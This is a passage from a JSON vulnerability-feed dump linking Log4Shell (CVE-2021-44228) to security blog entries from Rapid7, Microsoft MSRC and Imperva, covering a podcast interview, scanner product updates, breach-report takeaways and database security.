"RAPID7BLOG:45B045D2EE21432DF9939E4402522BFC", "href": "https://blog.rapid7.com/2022/03/09/3-reasons-to-join-rapid7s-cloud-security-summit/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-19T23:31:00", "description": "![\\[Security Nation\\] Mike Hanley of GitHub on the Log4j Vulnerability](https://blog.rapid7.com/content/images/2022/01/security_nation_logo.jpg)\n\nIn our first episode of Security Nation Season 5, Jen and Tod chat with Mike Hanley, Chief Security Officer at GitHub, all about the major vulnerability in Apache\u2019s Log4j logging library (aka Log4Shell). Mike talks about the ins and outs of GitHub\u2019s response to this blockbuster vulnerability and what could have helped the industry deal with an issue of this massive scope more effectively (hint: he drops the SBOM). They also touch on GitHub's updated policy on the sharing of exploits.\n\nStick around for our Rapid Rundown, where Tod and Jen talk about Microsoft\u2019s release of emergency fixes for Windows Server and VPN over Martin Luther King Day weekend.\n\n## Mike Hanley\n\n![\\[Security Nation\\] Mike Hanley of GitHub on the Log4j Vulnerability](https://blog.rapid7.com/content/images/2022/01/image1.jpg)\n\nMike Hanley is the Chief Security Officer at GitHub. Prior to GitHub, Mike was the Vice President of Security at Duo Security, where he built and led the security research, development, and operations functions. After Duo\u2019s acquisition by Cisco for $2.35 billion in 2018, Mike led the transformation of Cisco\u2019s cloud security framework and later served as CISO for the company. Mike also spent several years at CERT/CC as a Senior Member of the Technical Staff and security researcher focused on applied R&D programs for the US Department of Defense and the Intelligence Community.\n\nWhen he\u2019s not talking about security at GitHub, Mike can be found enjoying Ann Arbor, MI with his wife and seven kids.\n\n## Show notes\n\n**Interview links**\n\n * Read [GitHub\u2019s blog](<https://github.blog/2021-12-13-githubs-response-to-log4j-vulnerability-cve-2021-44228/>) on the Log4j vulnerability, and [the follow-up](<https://github.blog/2021-12-14-using-githubs-security-features-identify-log4j-exposure-codebase/>).\n * Check out GitHub\u2019s [Dependabot](<https://github.com/dependabot>).\n * Find out [Why Johnny Can\u2019t Encrypt](<https://www.usenix.org/conference/8th-usenix-security-symposium/why-johnny-cant-encrypt-usability-evaluation-pgp-50>).\n * Learn about [GitHub\u2019s Sponsor Program](<https://github.com/sponsors>).\n * Read about the work going on at [OpenSSF](<https://openssf.org/>).\n * Delve into Mike\u2019s [blog post on GitHub\u2019s exploit code policy](<https://github.blog/2021-06-04-updates-to-our-policies-regarding-exploits-malware-and-vulnerability-research/>).\n\n**Rapid Rundown links**\n\n * Get the info on [Microsoft\u2019s emergency fixes](<https://www.bleepingcomputer.com/news/microsoft/microsoft-releases-emergency-fixes-for-windows-server-vpn-bugs/>) for Windows Server and VPN bugs.\n\nLike the show? Want to keep Jen and Tod in the podcasting business? Feel free to rate and review with your favorite podcast purveyor, like [**Apple Podcasts**](<https://podcasts.apple.com/us/podcast/security-nation/id1124543784#see-all/reviews>).\n\n#### Want More Inspiring Stories From the Security Community?\n\n[Subscribe to Security Nation Today](<https://podcasts.apple.com/us/podcast/security-nation/id1124543784>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-19T21:47:30", "type": "rapid7blog", "title": "[Security Nation] Mike Hanley of GitHub on the Log4j Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-19T21:47:30", "id": "RAPID7BLOG:078D5EE222682A75AE1A1A3A3684E38D", "href": "https://blog.rapid7.com/2022/01/19/security-nation-mike-hanley-of-github-on-the-log4j-vulnerability/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-19T19:35:50", "description": "![What's New in InsightVM and Nexpose: Q1 2022 in Review](https://blog.rapid7.com/content/images/2022/04/insightvm-q1-22.jpg)\n\nThe world of cybersecurity never has a dull moment. While we are still recovering from the aftermath of [Log4Shell](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>), the recent [ContiLeaks](<https://www.rapid7.com/blog/post/2022/03/01/conti-ransomware-group-internal-chats-leaked-over-russia-ukraine-conflict/>) exposed multiple vulnerabilities that have been exploited by the Conti ransomware group. It\u2019s critical for your team to identify the risk posed by such vulnerabilities and implement necessary remediation measures. As you will see, the product updates our vulnerability management (VM) team has made to [InsightVM](<https://www.rapid7.com/products/insightvm/>) and [Nexpose](<https://www.rapid7.com/products/nexpose/>) in the last quarter will empower _you_ to stay in charge \u2014 not the vulnerabilities.\n\nBut that\u2019s not all we\u2019ve improved on. We\u2019ve increased the scope of vulnerabilities tracked by incorporating [CISA\u2019s known exploited vulnerabilities (KEV)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) in the Threat Feed, usability enhancements, targeted reporting and scanning, and Log4Shell mitigation checks. And we\u2019ve released our annual [Vulnerability Intelligence Report](<https://www.rapid7.com/products/insightvm/vulnerability-report-hub-page/>) to help you make sense of the vulns that impacted us last year and understand the trends that we will all be facing this year. Our team also offers practical guidance to help the security teams better protect themselves.\n\nLet\u2019s dive into the key feature releases and updates on the vulnerability management front for Q1 2022.\n\n## [InsightVM] ContiLeaks Helpful Query to easily detect ContiLeaks vulns and ensure compliance\n\nCISA\u2019s KEV catalog is part of the agency\u2019s [binding operative directive](<https://www.cisa.gov/binding-operational-directive-22-01>) that has reporting requirements for federal agencies and civilian contractors. The recent ContiLeaks revealed over 30 vulns that are now a part of CISA\u2019s KEV. While users could always build a query in IVM to identify these vulns, doing so is time-consuming and can be prone to error. The ContiLeaks Helpful Query takes out the manual effort and lets customers easily locate 30+ ContiLeaks vulnerabilities in their environments. When the query is loaded into our Specific Vulnerability Dashboard template, it can give an at-a-glance view of the company\u2019s risk posture as it relates to the Conti threat. In addition to helping customers identify the exploited vulnerabilities in their environment, the update will also help them stay within the bounds of CISA\u2019s operative directive.\n\n![What's New in InsightVM and Nexpose: Q1 2022 in Review](https://blog.rapid7.com/content/images/2022/04/screen_shot_2022-03-29_at_10.28.12_am.png)\n\n![What's New in InsightVM and Nexpose: Q1 2022 in Review](https://blog.rapid7.com/content/images/2022/04/screen_shot_2022-03-29_at_10.27.46_am.png)\n\n## [InsightVM] Threat feed dashboard now includes CISA\u2019s KEV catalog\n\nWhile we are on the topic of CISA, you will be excited to learn that we have expanded the scope of vulnerabilities tracked to incorporate CISA\u2019s KEV catalog in the InsightVM [Threat Feed Dashboard](<https://www.rapid7.com/blog/post/2017/06/13/live-threat-driven-prioritization/>), including the **Assets With Actively Targeted Vulnerabilities** card and the **Most Common Actively Targeted Vulnerabilities** card. The CISA inclusion makes it easy to see how exposed your organization is to active threats and inform prioritization decisions around remediation efforts. \n\nWe have also added a new \u201cCISA KEV (known exploited vulnerability)\u201d vulnerability category to allow for more targeted scanning (i.e. scanning the environment for CISA KEV entries only). You can also use the CISA KEV category to filter scan reports.\n\n![What's New in InsightVM and Nexpose: Q1 2022 in Review](https://blog.rapid7.com/content/images/2022/04/image1-4.png)\n\n## \n\n## [Insight VM and Nexpose] A new credential type to support scanning Oracle Databases by Service Name\n\nInsightVM and Nexpose customers have always been able to scan Oracle databases using SIDs (system identifiers) but were previously unable to provide a Service Name in the credential. This meant a gap in visibility for Oracle databases that could only be accessed via their Service Name. We were not happy with this limitation. Now, you now configure Oracle Database scans to specify a Service Name instead of an SID (you can still use the SID, if you want!) when authenticating. You now have the visibility into a wider range of deployment configurations of Oracle Database and the ability to configure scan using Service Name or SID.\n\n![What's New in InsightVM and Nexpose: Q1 2022 in Review](https://blog.rapid7.com/content/images/2022/04/image3-2.png)\n\n## [Insight VM and Nexpose] Automatic Scan Assistant credentials generation\n\nLast year, [we introduced Scan Assistant](<https://www.rapid7.com/blog/post/2022/02/18/whats-new-in-insightvm-and-nexpose-q4-2021-in-review/>), which alleviates the credential management (for Scan Engine) burden on vulnerability management teams. For the Scan Assistant to communicate with the Scan Engine, it requires digital certificates to be manually created and deployed on both the target assets and the Nexpose / IVM Security Console. Manually creating the public / private key pair is a complex and error-prone process. \n\nWith this update, we are taking some more burden off the vulnerability management teams. You can now use the Shared Credentials management UI to automatically generate Scan Assistant credentials. This not only reduces the technical expertise and time required to manage Scan Assistant credentials but also makes for a user-friendly experience for you.\n\nLearn more in our recent blog post on [passwordless scanning](<https://www.rapid7.com/blog/post/2021/10/18/passwordless-network-scanning-same-insights-less-risk/>).\n\n![What's New in InsightVM and Nexpose: Q1 2022 in Review](https://blog.rapid7.com/content/images/2022/04/image2-3.png)\n\n## [Insight VM and Nexpose] Log4Shell mitigation checks\n\nThe product improvements list would be incomplete without an update on Log4Shell.\n\nIf you are vulnerable to Log4Shell, you can edit the JAR files on a system to take out the vulnerable code and thus not get exploited. However, it is difficult to keep a check on this manually. This update adds that extra capability to not only look at the version of Log4j that was present in your environment but also check if it has been mitigated \u2014 i.e., if the vulnerable code is removed.\n\nAuthenticated scans and Agent-based assessments can now determine whether the JNDILookup class removal mitigation for Log4Shell has been applied to Log4j JAR files on Windows systems. This will reduce the number of reports of the vulnerability on systems that are not exploitable. We also added an Obsolete Software vulnerability check for Log4j 1.x, which will let you find obsolete versions of Log4j in your environment.\n\n## Stay in charge\n\nAs always, we hope these updates will make it easier for you to stay ahead of vulnerabilities. \n\nIt almost felt like the quarter might end on a calm note, but then the world of cybersecurity never has a dull moment. The end of the quarter saw Spring4Shell, another zero-day vulnerability in the Spring Core module of Spring Framework. [Learn more about Rapid7 response to this vulnerability](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>) and how we are working around the clock to help our customers protect their own environments from Spring4Shell.\n\n_**Additional reading: **_\n\n * _[InsightVM Release Notes](<https://docs.rapid7.com/release-notes/insightvm/>)_\n * _[Widespread Exploitation of Critical Remote Code Execution in Apache Log4j](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>)_\n * _[The Rapid7 Annual Vulnerability Intelligence Report Webcast](<https://information.rapid7.com/2021_Vuln_Intelligence_Report_WC.html>)_ \n\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-19T17:52:17", "type": "rapid7blog", "title": "What's New in InsightVM and Nexpose: Q1 2022 in Review", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-19T17:52:17", "id": "RAPID7BLOG:ED80467D2D29D8DC10E754C9EA19D9AD", "href": "https://blog.rapid7.com/2022/04/19/whats-new-in-insightvm-and-nexpose-q1-2022-in-review/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-31T13:56:09", "description": "![3 Takeaways From the 2022 Verizon Data Breach Investigations Report](https://blog.rapid7.com/content/images/2022/05/dbir-2022-takeaways.jpg)\n\nSometimes, data surprises you. When it does, it can force you to rethink your assumptions and second-guess the way you look at the world. But other times, data can reaffirm your assumptions, giving you hard proof they're the right ones \u2014 and providing increased motivation to act decisively based on that outlook.\n\nThe 2022 edition of [Verizon's Data Breach Investigations Report (DBIR)](<https://www.verizon.com/business/en-gb/resources/reports/dbir/>), which looks at data from cybersecurity incidents that occurred in 2021, is a perfect example of this latter scenario. This year's DBIR rings many of the same bells that have been resounding in the ears of security pros worldwide for the past 12 to 18 months \u2014 particularly, the threat of [ransomware](<https://www.rapid7.com/solutions/ransomware/>) and the increasing relevance of complex supply chain attacks.\n\nHere are our three big takeaways from the 2022 DBIR, and why we think they should have defenders doubling down on the big cybersecurity priorities of the current moment.\n\n## 1\\. Ransomware's rise is reaffirmed\n\nIn 2021, it was hard to find a cybersecurity headline that didn't somehow pertain to ransomware. It impacted some [80% of businesses last year](<https://thejournal.com/articles/2022/04/27/ransomware-hit-over-half-of-k12-organizations-worldwide-in-2021-sophos-survey-finds.aspx>) and threatened some of the institutions most critical to our society, from [primary and secondary schools](<https://thejournal.com/articles/2022/04/27/ransomware-hit-over-half-of-k12-organizations-worldwide-in-2021-sophos-survey-finds.aspx>) to [hospitals](<https://www.pewtrusts.org/en/research-and-analysis/blogs/stateline/2022/05/18/ransomware-attacks-on-hospitals-put-patients-at-risk>).\n\nThis year's DBIR confirms that ransomware is the critical threat that security pros and laypeople alike believe it to be. Ransomware-related breaches increased by 13% in 2021, the study found \u2014 that's a greater increase than we saw in the past 5 years _combined_. In fact, nearly 50% of all system intrusion incidents \u2014 i.e., those involving a series of steps by which attackers infiltrate a company's network or other systems \u2014 involved ransomware last year.\n\nWhile the threat has massively increased, the top methods of ransomware delivery remain the ones we're all familiar with: desktop sharing software, which accounted for 40% of incidents, and email at 35%, according to Verizon's data. The growing ransomware threat may seem overwhelming, but the most important steps organizations can take to prevent these attacks remain the fundamentals: educating end users on how to spot phishing attempts and maintain security best practices, and equipping infosec teams with the tools needed to detect and respond to suspicious activity.\n\n## 2\\. Attackers are eyeing the supply chain\n\nIn 2021 and 2022, we've been using the term \"supply chain\" more than we ever thought we would. COVID-induced disruptions in the flow of commodities and goods caused [lumber to skyrocket](<https://bdmag.com/lumber-price-volatility-supply-chain/>) and [automakers to run short on microchips](<https://www.consumerreports.org/buying-a-car/global-chip-shortage-makes-it-tough-to-buy-certain-cars-a8160576456/>).\n\nBut security pros have had a slightly different sense of the term on their minds: the software supply chain. Breaches from [Kaseya](<https://www.rapid7.com/blog/post/2021/07/13/managed-service-providers-used-in-coordinated-mass-ransomware-attack-impacting-hundreds-of-companies/>) to [SolarWinds](<https://www.rapid7.com/blog/post/2021/01/12/update-on-solarwinds-supply-chain-attack-sunspot-and-new-malware-family-associations/>) \u2014 not to mention the [Log4j vulnerability](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>) \u2014 reminded us all that vendors' systems are just as likely a vector of attack as our own.\n\nUnfortunately, Verizon's Data Breach Investigations Report indicates these incidents are not isolated events \u2014 the software supply chain is, in fact, a major avenue of exploitation by attackers. In fact, 62% of cyberattacks that follow the system intrusion pattern began with the threat actors exploiting vulnerabilities in a partner's systems, the study found.\n\nPut another way: If you were targeted with a system intrusion attack last year, it was almost twice as likely that it began on a partner's network than on your own.\n\nWhile supply chain attacks still account for just under 10% of overall cybersecurity incidents, according to the Verizon data, the study authors point out that this vector continues to account for a considerable slice of all incidents each year. That means it's critical for companies to keep an eye on both their own and their vendors' security posture. This could include:\n\n * Demanding visibility into the components behind software vendors' applications\n * Staying consistent with regular patching updates\n * Acting quickly to remediate and emergency-patch when the next major vulnerability that could affect high numbers of web applications rears its head\n\n## 3\\. Mind the app\n\nBetween [Log4Shell](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>) and [Spring4Shell](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>), the past 6 months have jolted developers and security pros alike to the realization that their web apps might contain vulnerable code. This proliferation of new avenues of exploitation is particularly concerning given just how commonly attackers target web apps.\n\nCompromising a web application was far and away the top cyberattack vector in 2021, accounting for roughly 70% of security incidents, according to Verizon's latest DBIR. Meanwhile, web servers themselves were the most commonly exploited asset type \u2014 they were involved in nearly 60% of documented breaches.\n\nMore than 80% of attacks targeting web apps involved the use of stolen credentials, emphasizing the importance of user awareness and strong authentication protocols at the endpoint level. That said, 30% of basic web application attacks did involve some form of exploited vulnerability \u2014 a percentage that should be cause for concern.\n\n\"While this 30% may not seem like an extremely high number, the targeting of mail servers using exploits has increased dramatically since last year, when it accounted for only 3% of the breaches,\" the authors of the Verizon DBIR wrote.\n\nThat means vulnerability exploits accounted for a 10 times greater proportion of web application attacks in 2021 than they did in 2022, reinforcing the importance of being able to quickly and efficiently test your applications for the [most common types of vulnerabilities](<https://www.rapid7.com/blog/post/2021/09/30/the-2021-owasp-top-10-have-evolved-heres-what-you-should-know/>) that hackers take advantage of.\n\n## Stay the course\n\nFor those who've been tuned into the current cybersecurity landscape, the key themes of the 2022 Verizon DBIR will likely feel familiar \u2014 and with so many major breaches and vulnerabilities that claimed the industry's attention in 2021, it would be surprising if there were any major curveballs we missed. But the key takeaways from the DBIR remain as critical as ever: Ransomware is a top-priority threat, software supply chains need greater security controls, and web applications remain a key attack vector.\n\nIf your go-forward cybersecurity plan reflects these trends, that means you're on the right track. Now is the time to stick to that plan and ensure you have tools and tactics in place that let you focus on the alerts and vulnerabilities that matter most.\n\n_**Additional reading:**_\n\n * _[A Year on from the Ransomware Task Force Report](<https://www.rapid7.com/blog/post/2022/05/24/a-year-on-from-the-ransomware-task-force-report/>)_\n * _[Are You in the 2.5% Who Meet This Cybersecurity Job Requirement?](<https://www.rapid7.com/blog/post/2022/05/20/are-you-in-the-2-5-who-meet-this-cybersecurity-job-requirement/>)_\n * _[What's Changed for Cybersecurity in Banking and Finance: New Study](<https://www.rapid7.com/blog/post/2022/05/10/whats-changed-for-cybersecurity-in-banking-and-finance-new-study/>)_\n * _[How to Strategically Scale Vendor Management and Supply Chain Security](<https://www.rapid7.com/blog/post/2022/04/26/how-to-strategically-scale-vendor-management-and-supply-chain-security/>)_\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-31T13:22:17", "type": "rapid7blog", "title": "3 Takeaways From the 2022 Verizon Data Breach Investigations Report", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-05-31T13:22:17", "id": "RAPID7BLOG:97E3CA7ED938F3DF6E967C832F314FA3", "href": "https://blog.rapid7.com/2022/05/31/3-takeaways-from-the-2022-verizon-data-breach-investigations-report/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "msrc": [{"lastseen": "2021-12-18T19:10:35", "description": "Published on: 2021 Dec 11, updated 2021 Dec 18. SUMMARY Microsoft continues our analysis of the remote code execution vulnerabilities related to Apache Log4j (a logging tool used in many Java-based applications) disclosed on 9 Dec 2021. Currently, Microsoft is not aware of any impact, outside of the initial disclosure involving Minecraft: Java Edition, to the \u2026\n\n[ Microsoft\u2019s Response to CVE-2021-44228 Apache Log4j 2 Read More \u00bb](<https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T05:28:18", "type": "msrc", "title": "Microsoft\u2019s Response to CVE-2021-44228 Apache Log4j 2", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-12T05:28:18", "id": "MSRC:543F3A129A47F4B14FB170389908717B", "href": "https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T15:58:15", "description": "\u672c\u30d6\u30ed\u30b0\u306f\u3001Microsoft\u2019s Response to CVE-2021-44228 Apache Log4j 2 \u306e\u6284\u8a33\u7248\u3067\u3059\u3002\u6700\u65b0\u306e\u60c5\u5831\u306f\u3001\u5143\u8a18\u4e8b\u3092\u53c2\u7167\u3057\u3066\u304f\u3060\u3055\u3044\u3002", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T08:00:00", "type": "msrc", "title": "CVE-2021-44228 Apache Log4j 2 \u306b\u5bfe\u3059\u308b\u30de\u30a4\u30af\u30ed\u30bd\u30d5\u30c8\u306e\u5bfe\u5fdc", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-12T08:00:00", "id": "MSRC:9783BD8B3A34301D0C5C34D252854BDF", "href": "/blog/2021/12/microsofts-response-to-cve-2021-44228-apache-log4j2-jp/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "impervablog": [{"lastseen": "2022-01-13T15:31:17", "description": "We have all heard the saying, \u201cearly detection is critical.\u201d This is true in most aspects of our daily lives; in everything from medical diagnosis, automobile issues, a leaky roof, credit card fraud, etc. It should come as no surprise that this is especially true in the context of [data security breaches](<https://www.imperva.com/solutions/safeguard-sensitive-and-personal-data/>) as well.\n\nFor many years, the cyber security industry has been rallying around the concept of preventing data breaches, and why not? To be sure, this is a reasonable goal for a cyber security team to aspire to achieve. In their effort, cyber security teams set up perimeter defenses, restrict data access, patch vulnerabilities, apply sensors to data movement sensors, encrypt data, etc. - and these are essential things to do. In the real world, however, these teams face the ongoing threats of [zero-day vulnerabilities](<https://www.imperva.com/learn/application-security/zero-day-exploit/>), [phishing attacks](<https://www.imperva.com/learn/application-security/phishing-attack-scam/>), stolen credentials, compromised laptops, poor application design, and a hundred other vectors designed specifically to stop them from achieving their goal. These ongoing threats are dynamic and constant. In a split second, they can render useless the manifold defenses that cyber security teams worked so hard to deploy to secure their data. It\u2019s time for a new mindset around protecting data.\n\n**Early detection: Not just for earthquakes and heart attacks anymore.**\n\nThe aforementioned threats to data security are not new. The [Open Web Application Security Project](<https://www.imperva.com/learn/application-security/owasp-top-10/>) (OWASP), a non-profit organization dedicated to helping website owners and security experts protect web applications from [cyber attacks](<https://www.imperva.com/learn/application-security/cyber-attack/>) has been around since 2001. Given that history, you'd think the statement \u201cit\u2019s time for a new mindset around protecting data\u201d would be a foregone conclusion at this point; but, it's not. In some respects, the evolution of data security is akin to the evolution of warfare. As I work with organizations on bolstering their cyber security posture, I am often reminded of Wellington\u2019s comment about Napoleon\u2019s defeat at the 1815 Battle of Waterloo, \u201cThey came on in the same old way and we defeated them in the same old way.\u201d I suspect that had there been hackers in those days, they\u2019d have echoed Wellington\u2019s sentiments. What most organizations need is not \u201cthe same, just more of it\u201d but a new mindset about how we consider gaps and weak spots in data protection today. It\u2019s really time to flip the traditional security paradigm on its head with a revised approach to protecting data, then apps, then endpoints, then the perimeter. Or more simply, a strategy in which protecting data itself is the priority. \n\n\n**Waterloo, 1815. Napoleon did not recognize the need for a new strategic paradigm.**\n\n## What\u2019s the problem?\n\nThe threat landscape changes every day. On December 1, \u201c[CVE-2021-44228](<https://www.imperva.com/blog/log4shell-log4j-remote-code-execution-the-covid-of-the-internet/>)\u201d may well have been the hull classification for a new US Navy ship for all we knew. When you consider new threat vectors every day, the notion of breach prevention almost seems like an outdated philosophy. An effective approach today to protecting sensitive data must be much more agile and dynamic. Look at the billions of dollars that enterprises spend to erect fortresses around their data only to be undermined almost daily by a privileged user clicking on a link in an unsolicited email or a missing patch on a router. The reality is that we no longer have black and white boundaries to protect. Instead, we must settle for a more practical and modest goal of minimizing the impact of breaches when they occur - because they will occur!\n\n## Breach detection at the database level is key\n\nOur new paradigm must compel us to focus on early detection of a breach where it matters most: at the database level. Routers, FWs, and laptops are not the hackers\u2019 intended targets. In fact, cybercriminals are not even after your money, directly. Personally identifiable data is far more valuable. As I said, tactics such as protecting the perimeter and deploying web application defenses are important; but at the end of the day, these are all merely entry points from which a cyber attacker can pivot to find and steal the real crown jewels, the concentrated sensitive personal data you keep in databases across your entire architecture. Make no mistake: the goal of most cyber attackers is to identify and exfiltrate customer, patient, payment card or intellectual property information from your data sources because those are precisely the assets that have tangible value in the shadowy depths of the internet. For cyber security practitioners, the process is challenging but very straightforward. Gain visibility into 100% of your data estate and use reliable, automated analytics tools to get a handle on what is normal so you can quickly identify suspicious behavior and orchestrate actions to stop it.\n\n## The negative consequences of doing nothing\n\nThe impact of a breach that goes undetected and results in the compromise and loss of sensitive customer data is far-ranging. The most common impact is financial losses. The longer the breach is undetected, the higher the loss potential. These losses range from regulatory fines, identity protection offerings, reputation/confidence damage resulting in lost customers, and now class action lawsuits. Lawsuits that could have been avoided if there was an attempt at \u201cadequate\u201d or \u201creasonable\u201d controls around data which could have reduced the time to detection and minimized the impact of data loss. Of course, there are always secondary impacts in the form of negative brand reputation, high turnover from exhausted security/IT teams, poor corporate morale, etc. The bottom line: the longer you stick to the \u201csame old, same old\u201d and succumb to budget and technology inertia year after year, the more damaging these attacks will be and the more likely they\u2019ll be to pose an existential threat to your enterprise going forward.\n\n**A typical result of years of budget and technology inertia. Spoiler alert: you're the zebra.**\n\nIn this series of blogs, we\u2019ll familiarize you with what a typical attack scenario looks like in today\u2019s threat landscape so you\u2019ll know it when you see it. We\u2019ll explain the core functionalities you need to have today from your database security solution and provide tips and insights into how to build on your existing security posture and put your new solution into practice. Watch this space\u2026\n\nThe post [Analytics Are Essential for Effective Database Security](<https://www.imperva.com/blog/analytics-are-essential-for-effective-database-security/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-13T15:23:02", "type": "impervablog", "title": "Analytics Are Essential for Effective Database 